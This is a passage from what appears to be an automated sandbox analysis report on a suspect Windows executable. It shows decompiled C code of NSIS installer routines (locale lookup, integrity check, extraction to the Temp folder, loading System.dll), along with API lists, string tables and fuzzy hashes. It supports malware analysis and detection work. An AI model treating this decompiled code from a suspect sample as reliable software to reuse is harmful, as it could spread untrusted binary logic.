                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                        • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                        • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                        • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                        0x004036b5
                                                                                        0x004036be
                                                                                        0x004036c5
                                                                                        0x004036c7
                                                                                        0x004036db
                                                                                        0x004036ed
                                                                                        0x004036f7
                                                                                        0x004036fc
                                                                                        0x00403702
                                                                                        0x00403715
                                                                                        0x00403715
                                                                                        0x00403720
                                                                                        0x004036c9
                                                                                        0x004036d4
                                                                                        0x004036d4
                                                                                        0x00403725
                                                                                        0x0040372f
                                                                                        0x00403738
                                                                                        0x0040373d
                                                                                        0x0040374e
                                                                                        0x004037d5
                                                                                        0x004037dd
                                                                                        0x004037e6
                                                                                        0x004037e6
                                                                                        0x004037fc
                                                                                        0x00403802
                                                                                        0x00403810
                                                                                        0x0040389f
                                                                                        0x004038a7
                                                                                        0x004038b1
                                                                                        0x004038b6
                                                                                        0x004038bc
                                                                                        0x00403946
                                                                                        0x0040394b
                                                                                        0x0040394d
                                                                                        0x00403969
                                                                                        0x00000000
                                                                                        0x00403969
                                                                                        0x0040394f
                                                                                        0x00403955
                                                                                        0x0040395d
                                                                                        0x0040395d
                                                                                        0x00000000
                                                                                        0x00403955
                                                                                        0x004038ca
                                                                                        0x004038db
                                                                                        0x004038dd
                                                                                        0x004038df
                                                                                        0x004038e6
                                                                                        0x004038e6
                                                                                        0x004038ee
                                                                                        0x004038f6
                                                                                        0x004038f8
                                                                                        0x004038fa
                                                                                        0x00403903
                                                                                        0x00403906
                                                                                        0x0040390c
                                                                                        0x0040390c
                                                                                        0x0040392b
                                                                                        0x0040393c
                                                                                        0x00000000
                                                                                        0x00403941
                                                                                        0x004038a9
                                                                                        0x004038ab
                                                                                        0x00000000
                                                                                        0x00403816
                                                                                        0x00403816
                                                                                        0x0040381c
                                                                                        0x00403826
                                                                                        0x0040382e
                                                                                        0x00403838
                                                                                        0x0040383e
                                                                                        0x0040384c
                                                                                        0x0040396e
                                                                                        0x0040396e
                                                                                        0x00000000
                                                                                        0x0040396e
                                                                                        0x00403852
                                                                                        0x0040385b
                                                                                        0x0040389a
                                                                                        0x00000000
                                                                                        0x0040389a
                                                                                        0x00403754
                                                                                        0x00403754
                                                                                        0x00403759
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403763
                                                                                        0x00403773
                                                                                        0x00403778
                                                                                        0x0040377f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403783
                                                                                        0x00403785
                                                                                        0x00403792
                                                                                        0x00403792
                                                                                        0x0040379a
                                                                                        0x004037a0
                                                                                        0x004037c8
                                                                                        0x004037d0
                                                                                        0x00000000
                                                                                        0x004037b2
                                                                                        0x004037b3
                                                                                        0x004037bc
                                                                                        0x004037c2
                                                                                        0x004037c3
                                                                                        0x00000000
                                                                                        0x004037c3
                                                                                        0x004037be
                                                                                        0x004037c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004037c0
                                                                                        0x004037a0

                                                                                        APIs
                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                        • lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\SX365783909782021.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
                                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\SX365783909782021.exe" ), ref: 00403795
                                                                                        • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 004037B3
                                                                                        • LoadImageA.USER32 ref: 004037FC
                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                        • RegisterClassA.USER32 ref: 00403843
                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                        • CreateWindowExA.USER32 ref: 00403894
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                        • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                        • GetClassInfoA.USER32 ref: 004038F6
                                                                                        • GetClassInfoA.USER32 ref: 00403903
                                                                                        • RegisterClassA.USER32 ref: 0040390C
                                                                                        • DialogBoxParamA.USER32 ref: 0040392B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: "C:\Users\user\Desktop\SX365783909782021.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                        • API String ID: 914957316-1637081516
                                                                                        • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                        • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                        • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                        • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\SX365783909782021.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\hardz\\Desktop\\SX365783909782021.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\SX365783909782021.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x438f8
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x0
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                                                        0x00402c80
                                                                                        0x00402c83
                                                                                        0x00402c9d
                                                                                        0x00402ca2
                                                                                        0x00402cb5
                                                                                        0x00402cba
                                                                                        0x00402cc0
                                                                                        0x00000000
                                                                                        0x00402cc2
                                                                                        0x00402cd3
                                                                                        0x00402ce4
                                                                                        0x00402ceb
                                                                                        0x00402cf3
                                                                                        0x00402cf8
                                                                                        0x00402cfa
                                                                                        0x00402dea
                                                                                        0x00402dec
                                                                                        0x00402df8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402e01
                                                                                        0x00402e2d
                                                                                        0x00402e32
                                                                                        0x00402e3d
                                                                                        0x00402e3f
                                                                                        0x00402e50
                                                                                        0x00402e6b
                                                                                        0x00402e74
                                                                                        0x00402e79
                                                                                        0x00402e98
                                                                                        0x00402ea8
                                                                                        0x00402eba
                                                                                        0x00402ebf
                                                                                        0x00402ec7
                                                                                        0x00402ed4
                                                                                        0x00402edc
                                                                                        0x00402ee1
                                                                                        0x00402ee3
                                                                                        0x00402ee3
                                                                                        0x00402eeb
                                                                                        0x00402eeb
                                                                                        0x00402eee
                                                                                        0x00402eef
                                                                                        0x00402eef
                                                                                        0x00402ef2
                                                                                        0x00402ef4
                                                                                        0x00402ef4
                                                                                        0x00402ef7
                                                                                        0x00402efe
                                                                                        0x00402f0a
                                                                                        0x00000000
                                                                                        0x00402f0f
                                                                                        0x00000000
                                                                                        0x00402ec7
                                                                                        0x00000000
                                                                                        0x00402e7b
                                                                                        0x00402e09
                                                                                        0x00402e1b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402d00
                                                                                        0x00402d00
                                                                                        0x00402d05
                                                                                        0x00402d09
                                                                                        0x00402d10
                                                                                        0x00402d17
                                                                                        0x00402d19
                                                                                        0x00402d19
                                                                                        0x00402d21
                                                                                        0x00402d28
                                                                                        0x00402e87
                                                                                        0x00402ec9
                                                                                        0x00000000
                                                                                        0x00402ec9
                                                                                        0x00402d34
                                                                                        0x00402db8
                                                                                        0x00402dbb
                                                                                        0x00402dc0
                                                                                        0x00000000
                                                                                        0x00402db8
                                                                                        0x00402d41
                                                                                        0x00402d46
                                                                                        0x00402d4e
                                                                                        0x00402d74
                                                                                        0x00402d7a
                                                                                        0x00402d83
                                                                                        0x00402d89
                                                                                        0x00402d8e
                                                                                        0x00402d94
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402d9e
                                                                                        0x00402da6
                                                                                        0x00402da9
                                                                                        0x00402dae
                                                                                        0x00402db0
                                                                                        0x00402db0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402d9e
                                                                                        0x00402dc1
                                                                                        0x00402dc7
                                                                                        0x00402dd7
                                                                                        0x00402dd7
                                                                                        0x00402dda
                                                                                        0x00402de0
                                                                                        0x00402de2
                                                                                        0x00000000
                                                                                        0x00402d00

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402C86
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SX365783909782021.exe,00000400), ref: 00402CA2
                                                                                          • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\SX365783909782021.exe,80000000,00000003), ref: 00405841
                                                                                          • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SX365783909782021.exe,C:\Users\user\Desktop\SX365783909782021.exe,80000000,00000003), ref: 00402CEB
                                                                                        • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32
                                                                                        Strings
                                                                                        • soft, xrefs: 00402D62
                                                                                        • Null, xrefs: 00402D6B
                                                                                        • C:\Users\user\Desktop\SX365783909782021.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                        • Inst, xrefs: 00402D59
                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                        • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                        • Error launching installer, xrefs: 00402CC2
                                                                                        • "C:\Users\user\Desktop\SX365783909782021.exe" , xrefs: 00402C7F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                        • String ID: "C:\Users\user\Desktop\SX365783909782021.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SX365783909782021.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                        • API String ID: 2803837635-925111448
                                                                                        • Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                        • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                        • Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                        • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 75%
                                                                                        			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\hardz\AppData\Local\Temp\nsvDA2D.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\hardz\AppData\Local\Temp\nsvDA2D.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                        0x00401734
                                                                                        0x0040173b
                                                                                        0x00401744
                                                                                        0x00401747
                                                                                        0x0040174a
                                                                                        0x0040174f
                                                                                        0x00401757
                                                                                        0x00401773
                                                                                        0x00401759
                                                                                        0x00401759
                                                                                        0x0040175a
                                                                                        0x0040175a
                                                                                        0x00401779
                                                                                        0x00401783
                                                                                        0x00401783
                                                                                        0x00401787
                                                                                        0x0040178a
                                                                                        0x0040178f
                                                                                        0x00401791
                                                                                        0x00401793
                                                                                        0x00401798
                                                                                        0x00401798
                                                                                        0x004017a3
                                                                                        0x004017a3
                                                                                        0x004017b4
                                                                                        0x004017b6
                                                                                        0x004017b6
                                                                                        0x004017b7
                                                                                        0x004017b7
                                                                                        0x004017ba
                                                                                        0x004017bd
                                                                                        0x004017c0
                                                                                        0x004017c0
                                                                                        0x004017c7
                                                                                        0x004017d6
                                                                                        0x004017db
                                                                                        0x004017de
                                                                                        0x004017e1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004017e3
                                                                                        0x004017e6
                                                                                        0x00401840
                                                                                        0x00401845
                                                                                        0x004015a8
                                                                                        0x0040265c
                                                                                        0x0040265c
                                                                                        0x0040288b
                                                                                        0x0040288e
                                                                                        0x0040288e
                                                                                        0x00000000
                                                                                        0x004017e8
                                                                                        0x004017ee
                                                                                        0x004017f9
                                                                                        0x00401806
                                                                                        0x00401811
                                                                                        0x00401827
                                                                                        0x00401827
                                                                                        0x0040182a
                                                                                        0x00000000
                                                                                        0x00401830
                                                                                        0x00401830
                                                                                        0x00401831
                                                                                        0x0040184e
                                                                                        0x00402894
                                                                                        0x00402894
                                                                                        0x00402894
                                                                                        0x00401833
                                                                                        0x00401833
                                                                                        0x00401834
                                                                                        0x00401492
                                                                                        0x0040220e
                                                                                        0x0040220e
                                                                                        0x0040220e
                                                                                        0x00401831
                                                                                        0x0040182a
                                                                                        0x00402896
                                                                                        0x0040289a
                                                                                        0x0040289a
                                                                                        0x0040185e
                                                                                        0x00401863
                                                                                        0x00401871
                                                                                        0x00401876
                                                                                        0x0040187c
                                                                                        0x00401880
                                                                                        0x00401882
                                                                                        0x0040188a
                                                                                        0x00401896
                                                                                        0x00401884
                                                                                        0x00401884
                                                                                        0x00401888
                                                                                        0x00000000
                                                                                        0x00000000
